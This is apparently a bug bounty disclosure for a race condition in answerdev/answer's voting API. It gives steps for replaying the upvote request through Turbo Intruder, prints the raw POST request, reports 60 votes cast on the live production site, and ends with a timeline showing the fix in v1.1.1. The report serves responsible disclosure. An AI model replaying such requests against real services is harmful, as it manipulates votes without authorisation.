Race Condition Vulnerability can Leads to Up Vote Stealing in answerdev/answer


Reported on

Feb 20th 2023


I tested in the live production site https://meta.answer.dev/. There are up vote / down vote functions in answerdev. An attacker can increase or decrease votes by using race condition vulnerability.

Proof of Concept

1). Go to an question and press up vote or down vote.
2). PoC will show with upvote.
3). Intercept HTTP Request and send to Trubo intruder.
4). Configure and run.
5). Bingo! 

POST /answer/api/v1/vote/up HTTP/2
Host: meta.answer.dev
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: en_US
Accept-Encoding: gzip, deflate
Authorization: 4eb174c8-b0f3-11ed-83ed-0242ac190003
Content-Type: application/json
Content-Length: 51
Origin: https://meta.answer.dev
Referer: https://meta.answer.dev/questions/10010000000000001/welcome-to-answer-community
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers


Go to this link and search "sunny" user. I voted 60 votes on his comment. https://meta.answer.dev/questions/10010000000000001/welcome-to-answer-community


The attacker now can gain profit in vote functions.


We are processing your report and will contact the answerdev/answer team within 24 hours. 10 months ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 10 months ago
We have contacted a member of the answerdev/answer team and are waiting to hear back 9 months ago
Ko Ko Naing
9 months ago


May I know any update please?

Ko Ko Naing
8 months ago


This is kindly follow up comment.

answerdev/answer maintainer validated this vulnerability 4 months ago
Ko Ko Naing has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
answerdev/answer maintainer marked this as fixed in v1.1.1 with commit 47661d 4 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
answerdev/answer maintainer published this vulnerability 4 months ago
to join this conversation